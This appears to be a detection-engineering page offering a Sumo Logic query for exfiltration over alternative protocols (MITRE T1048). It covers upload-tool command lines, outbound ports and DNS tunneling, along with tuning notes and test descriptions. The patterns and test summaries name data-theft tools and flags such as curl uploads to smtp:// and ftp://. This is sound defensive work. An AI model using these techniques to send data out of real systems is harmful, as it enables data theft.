Detect Exfiltration Over Alternative Protocol in Sumo Logic CSE
Adversaries may steal data by exfiltrating it over a different protocol than that used for command and control. Data may be sent over FTP, SMTP, DNS, SMB, HTTP/S, or any other network protocol not serving as the primary C2 channel. Adversaries often encrypt or obfuscate these alternate channels. Common tools include curl, ftp.exe, WinSCP, and built-in OS utilities. DNS tunneling (encoding data in DNS query subdomains) is a particularly stealthy variant used by malware families like FrameworkPOS. IaaS and SaaS platforms (Exchange, SharePoint, GitHub, AWS S3) can also serve as exfiltration endpoints via cloud APIs or direct downloads.
MITRE ATT&CK
- Tactic
- Exfiltration
- Canonical reference
- https://attack.mitre.org/techniques/T1048/
Sumo Detection Query
// Branch 1: Exfil tool with upload indicators (Sysmon Event ID 1)
_sourceCategory=windows/sysmon ("EventID=1" OR "<EventID>1</EventID>")
| parse "<Image>*</Image>" as Image
| parse "<CommandLine>*</CommandLine>" as CommandLine
| parse "<ParentImage>*</ParentImage>" as ParentImage
| parse "<User>*</User>" as User
| parse "<Computer>*</Computer>" as Computer
| where (
Image matches "*ftp.exe" OR Image matches "*curl.exe" OR Image matches "*winscp.exe"
OR Image matches "*pscp.exe" OR Image matches "*sftp.exe" OR Image matches "*bitsadmin.exe"
OR Image matches "*robocopy.exe" OR Image matches "*wget.exe"
)
| where (
CommandLine matches "* -T *" OR CommandLine matches "*--upload-file*" OR CommandLine matches "* PUT *"
OR CommandLine matches "*ftp://*" OR CommandLine matches "*sftp://*" OR CommandLine matches "*ftps://*"
OR CommandLine matches "*smtp://*" OR CommandLine matches "*--mail-from*" OR CommandLine matches "*--mail-rcpt*"
OR CommandLine matches "* -F *" OR CommandLine matches "*--form*"
)
| fields _messagetime, Computer, User, Image, CommandLine, ParentImage
| concat("ExfilToolUpload") as DetectionBranch
// Branch 2: Outbound network connections on exfil ports (Sysmon Event ID 3)
// Run as separate query:
// _sourceCategory=windows/sysmon ("EventID=3" OR "<EventID>3</EventID>")
// | parse "<DestinationIp>*</DestinationIp>" as DestinationIp
// | parse "<DestinationPort>*</DestinationPort>" as DestinationPort
// | parse "<Image>*</Image>" as Image
// | parse "<User>*</User>" as User
// | parse "<Computer>*</Computer>" as Computer
// | where DestinationPort in ("21","22","25","465","587","989","990","2121","2222")
// | where !( DestinationIp matches "10.*" OR DestinationIp matches "192.168.*" OR DestinationIp matches "172.1[6-9].*" OR DestinationIp matches "172.2[0-9].*" OR DestinationIp matches "172.3[0-1].*" OR DestinationIp matches "127.*")
// | where !( Image matches "*svchost.exe" OR Image matches "*lsass.exe" OR Image matches "*Outlook.exe" OR Image matches "*thunderbird.exe" OR Image matches "*filezilla.exe")
// | timeslice 1h
// | count as Connections by Computer, User, Image, DestinationIp, DestinationPort, _timeslice
// | where Connections > 5
// | concat("SuspiciousOutboundPort") as DetectionBranch
// Branch 3: DNS tunneling — long DNS query names (Sysmon Event ID 22)
// Run as separate query:
// _sourceCategory=windows/sysmon ("EventID=22" OR "<EventID>22</EventID>")
// | parse "<QueryName>*</QueryName>" as QueryName
// | parse "<Image>*</Image>" as Image
// | parse "<User>*</User>" as User
// | parse "<Computer>*</Computer>" as Computer
// | where length(QueryName) > 50
// | where !( QueryName matches "*.microsoft.com" OR QueryName matches "*.windows.com" OR QueryName matches "*.google.com" OR QueryName matches "*.amazon.com" OR QueryName matches "*.cloudfront.net")
// | timeslice 1h
// | count as DNSQueryCount, max(length(QueryName)) as MaxQueryLen by Computer, User, Image, _timeslice
// | where DNSQueryCount > 20 OR MaxQueryLen > 100
// | concat("DNSTunnelingSuspect") as DetectionBranchThree-branch Sumo Logic detection for exfiltration over alternative protocols using Sysmon XML event parsing. Branch 1 targets known exfil tools with upload command-line indicators. Branch 2 detects outbound connections to exfil-relevant ports from non-standard processes. Branch 3 identifies DNS tunneling via long query names or high DNS query volume.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate use of curl or wget by developers testing API endpoints with POST/PUT methods — add a process parent filter to exclude IDEs and terminals used by known developer accounts
- Robocopy jobs replicating data to remote file shares over SMB — verify if DestinationPort 445 triggers and adjust port list accordingly
- Cloud sync clients with long hostname CDN endpoints triggering the DNS query length threshold — maintain a domain allowlist and tune the 50-char threshold based on baseline DNS telemetry
Other platforms for T1048
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1FTP Upload via Windows Built-in FTP Client
Expected signal: Sysmon Event ID 1: Process Create with Image=ftp.exe, CommandLine containing '-s:%TEMP%\df00tech-ftp.txt'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:21 from ftp.exe. Sysmon Event ID 11: File create for the ftp script file in TEMP.
- Test 2curl SMTP Exfiltration Simulation
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '--mail-from', '--mail-rcpt', '--upload-file', 'smtp://'. Sysmon Event ID 3: Network Connection to 127.0.0.1:25 from curl.exe. The connection will fail but telemetry events fire.
- Test 3DNS Tunneling Simulation via Long Subdomain Queries
Expected signal: Sysmon Event ID 22 (DNS Query): 25 events with QueryName containing long base64-encoded subdomains (>50 characters) under df00tech-test.com. DNS queries will fail to resolve (NXDOMAIN) but the DNS telemetry events are generated by the Sysmon DNS query logging provider.
- Test 4curl Upload via HTTP PUT (Alternative Protocol Exfiltration)
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '-X PUT', '-T', and 'http://127.0.0.1:8888'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8888. Sysmon Event ID 11: File Create for exfil_test.txt in TEMP directory.
- Test 5SCP File Exfiltration via OpenSSH (Linux/macOS)
Expected signal: Auditd EXECVE record for scp with arguments including the destination host and port. Network connection event to 198.51.100.1:22. On systems with Sysmon for Linux: Process Create event (EventCode=1) for scp binary, Network Connect (EventCode=3) for the outbound SSH connection attempt.
References (12)
- https://attack.mitre.org/techniques/T1048/
- http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
- https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- https://blog.talosintelligence.com/poetrat-update-april-2020/
- https://www.sentinelone.com/labs/frameworkpos-another-pos-threat-using-dns-for-exfiltration/
- https://www.welivesecurity.com/2021/01/26/operation-windmill-eset-research-kobalos/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/play-ransomware
- https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection
Unlock Pro Content
Get the full detection package for T1048 including response playbook, investigation guide, and atomic red team tests.